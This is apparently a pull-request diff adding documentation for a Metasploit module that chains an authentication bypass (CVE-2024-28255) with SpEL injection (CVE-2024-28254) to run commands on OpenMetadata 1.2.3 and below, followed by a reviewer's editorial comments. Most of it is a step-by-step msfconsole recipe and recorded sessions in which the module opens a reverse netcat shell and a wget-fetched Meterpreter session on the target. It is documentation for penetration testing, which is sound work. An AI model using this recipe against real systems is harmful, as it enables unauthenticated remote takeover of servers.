| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, |
| 4 | +in-depth lineage, and seamless team collaboration. |
| 5 | +This module chains two vulnerabilities that exist in the OpenMetadata application. |
| 6 | +The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication |
| 7 | +using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints |
| 8 | +that does not require authentication. |
| 9 | +Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the |
| 10 | +excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the |
| 11 | +authentication mechanism and reach any arbitrary endpoint. |
| 12 | +By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for |
| 13 | +arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able |
| 14 | +to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication. |
| 15 | + |
| 16 | +OpenMetadata versions `1.2.3` and below are vulnerable. |
| 17 | + |
| 18 | +The following releases were tested. |
| 19 | +* OpenMetadata 1.2.3 on Docker |
| 20 | + |
| 21 | +## Installation steps to install the OpenMedata running on Docker |
| 22 | +* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment). |
| 23 | +* Please ensure that you download version 1.2.3 or below. |
| 24 | +* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`. |
| 25 | + |
| 26 | +You are now ready to test the module. |
| 27 | + |
| 28 | +## Verification Steps |
| 29 | +- [ ] Start `msfconsole` |
| 30 | +- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce` |
| 31 | +- [ ] `set rhosts <ip-target>` |
| 32 | +- [ ] `set rport <port>` |
| 33 | +- [ ] `set lhost <attacker-ip>` |
| 34 | +- [ ] `set target <0=Unix Command, 1=Linux Dropper>` |
| 35 | +- [ ] `exploit` |
| 36 | +- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings |
| 37 | + |
| 38 | +## Options |
| 39 | +No specific options |
| 40 | + |
| 41 | +## Scenarios |
| 42 | +```msf |
| 43 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info |
| 44 | +
|
| 45 | + Name: OpenMetadata authentication bypass and SpEL injection exploit chain |
| 46 | + Module: exploit/linux/http/openmetadata_auth_bypass_rce |
| 47 | + Platform: Unix, Linux |
| 48 | + Arch: cmd, x64, x86 |
| 49 | + Privileged: Yes |
| 50 | + License: Metasploit Framework License (BSD) |
| 51 | + Rank: Excellent |
| 52 | + Disclosed: 2024-03-15 |
| 53 | +
|
| 54 | +Provided by: |
| 55 | + |
| 56 | + Matias Puerta alias tutte (https://github.com/tutte) |
| 57 | +
|
| 58 | +Module side effects: |
| 59 | + ioc-in-logs |
| 60 | + artifacts-on-disk |
| 61 | +
|
| 62 | +Module stability: |
| 63 | + crash-safe |
| 64 | +
|
| 65 | +Module reliability: |
| 66 | + repeatable-session |
| 67 | +
|
| 68 | +Available targets: |
| 69 | + Id Name |
| 70 | + -- ---- |
| 71 | + => 0 Unix Command |
| 72 | + 1 Linux Dropper |
| 73 | +
|
| 74 | +Check supported: |
| 75 | + Yes |
| 76 | +
|
| 77 | +Basic options: |
| 78 | + Name Current Setting Required Description |
| 79 | + ---- --------------- -------- ----------- |
| 80 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 81 | + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit. |
| 82 | + html |
| 83 | + RPORT 8585 yes The target port (TCP) |
| 84 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 85 | + SSLCert no Path to a custom SSL certificate (default is randomly generated) |
| 86 | + TARGETURI / yes The URI path of the OpenMetadata web application |
| 87 | + URIPATH no The URI to use for this exploit (default is random) |
| 88 | + VHOST no HTTP server virtual host |
| 89 | +
|
| 90 | +
|
| 91 | + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: |
| 92 | +
|
| 93 | + Name Current Setting Required Description |
| 94 | + ---- --------------- -------- ----------- |
| 95 | + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0. |
| 96 | + 0.0.0 to listen on all addresses. |
| 97 | + SRVPORT 8080 yes The local port to listen on. |
| 98 | +
|
| 99 | +Payload information: |
| 100 | +
|
| 101 | +Description: |
| 102 | + OpenMetadata is a unified platform for discovery, observability, and governance powered |
| 103 | + by a central metadata repository, in-depth lineage, and seamless team collaboration. |
| 104 | + This module chains two vulnerabilities that exist in the OpenMetadata aplication. |
| 105 | + The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens. |
| 106 | + It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded |
| 107 | + endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters |
| 108 | + to make any path contain any arbitrary strings that will match the excluded endpoint condition |
| 109 | + and therefore will be processed with no JWT validation allowing an attacker to bypass the |
| 110 | + authentication mechanism and reach any arbitrary endpoint. |
| 111 | + By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection |
| 112 | + at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers |
| 113 | + are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any |
| 114 | + authentication. |
| 115 | + OpenMetadata versions `1.2.3` and below are vulnerable. |
| 116 | +
|
| 117 | +References: |
| 118 | + https://nvd.nist.gov/vuln/detail/CVE-2024-28255 |
| 119 | + https://nvd.nist.gov/vuln/detail/CVE-2024-28254 |
| 120 | + https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 |
| 121 | + https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255 |
| 122 | + https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/ |
| 123 | +
|
| 124 | +View the full module info with the info -d command. |
| 125 | +``` |
| 126 | +### OpenMetadata 1.2.3 Unix command - cmd/unix/reverse_netcat_gaping |
| 127 | +```msf |
| 128 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 0 |
| 129 | +target => 0 |
| 130 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping |
| 131 | +payload => cmd/unix/reverse_netcat_gaping |
| 132 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42 |
| 133 | +rhosts => 192.168.201.42 |
| 134 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8 |
| 135 | +lhost => 192.168.201.8 |
| 136 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit |
| 137 | +
|
| 138 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 139 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 140 | +[*] Trying to detect if target is running a vulnerable version of OpenMetadata. |
| 141 | +[+] The target is vulnerable. Version 1.2.3 |
| 142 | +[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping |
| 143 | +[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000 |
| 144 | +
|
| 145 | +id |
| 146 | +uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata) |
| 147 | +pwd |
| 148 | +/opt/openmetadata |
| 149 | +uname -a |
| 150 | +Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux |
| 151 | +``` |
| 152 | +### OpenMetadata 1.2.3 Linux Dropper - linux/x64/meterpreter/reverse_tcp |
| 153 | +```msf |
| 154 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set target 1 |
| 155 | +target => 1 |
| 156 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload linux/x64/meterpreter/reverse_tcp |
| 157 | +payload => linux/x64/meterpreter/reverse_tcp |
| 158 | +msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit |
| 159 | +
|
| 160 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 161 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 162 | +[*] Trying to detect if target is running a vulnerable version of OpenMetadata. |
| 163 | +[+] The target is vulnerable. Version 1.2.3 |
| 164 | +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp |
| 165 | +[*] Using URL: http://192.168.201.8:8080/WnMaYO |
| 166 | +[*] Client 192.168.201.42 (Wget) requested /WnMaYO |
| 167 | +[*] Sending payload to 192.168.201.42 (Wget) |
| 168 | +[*] Command Stager progress - 50.46% done (55/109 bytes) |
| 169 | +[*] Command Stager progress - 70.64% done (77/109 bytes) |
| 170 | +[*] Sending stage (3045380 bytes) to 192.168.201.42 |
| 171 | +[*] Command Stager progress - 82.57% done (90/109 bytes) |
| 172 | +[*] Command Stager progress - 100.00% done (109/109 bytes) |
| 173 | +[*] Meterpreter session 18 opened (192.168.201.8:4444 -> 192.168.201.42:55205) at 2024-07-29 15:30:41 +0000 |
| 174 | +[*] Server stopped. |
| 175 | +
|
| 176 | +meterpreter > getuid |
| 177 | +Server username: openmetadata |
| 178 | +meterpreter > sysinfo |
| 179 | +Computer : 172.16.240.4 |
| 180 | +OS : (Linux 6.6.32-linuxkit) |
| 181 | +Architecture : x64 |
| 182 | +BuildTuple : x86_64-linux-musl |
| 183 | +Meterpreter : x64/linux |
| 184 | +meterpreter > pwd |
| 185 | +/opt/openmetadata |
| 186 | +meterpreter > |
| 187 | +``` |
| 188 | +## Limitations |
| 189 | +Only limited payloads will work, so stick to the default payloads configured at the module. |
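Review bot: the prose in this new doc has several typos and grammar slips that are copied verbatim into the module's `info` description, so fix them before merge: `+## Installation steps to install the OpenMedata running on Docker` (OpenMetadata, and the heading can simply read "Installation steps"), "your should be able to access" should be "you should", "aplication" in the `info` output description, "a list of excluded endpoints that does not require authentication" should be "that do not require", and there is a missing space before "attackers" after the `<expression>` endpoint. Two content points as well: the installation section links the v1.3.x quick-start docs while telling the reader to run 1.2.3 or below, so state how to pin the older release in that Docker deployment, otherwise a fresh install lands on a patched build and the automatic check will report it not vulnerable; and `+Only limited payloads will work, so stick to the default payloads configured at the module.` is not actionable as written, so name the payloads that were actually verified (the two shown in Scenarios, `cmd/unix/reverse_netcat_gaping` and `linux/x64/meterpreter/reverse_tcp`) and, if known, why others fail. Finally, the recorded `info` output shows `Privileged: Yes` while both captured sessions run as `uid=1000(openmetadata)` / `Server username: openmetadata`; recheck the module's Privileged metadata, since the doc as pasted contradicts itself.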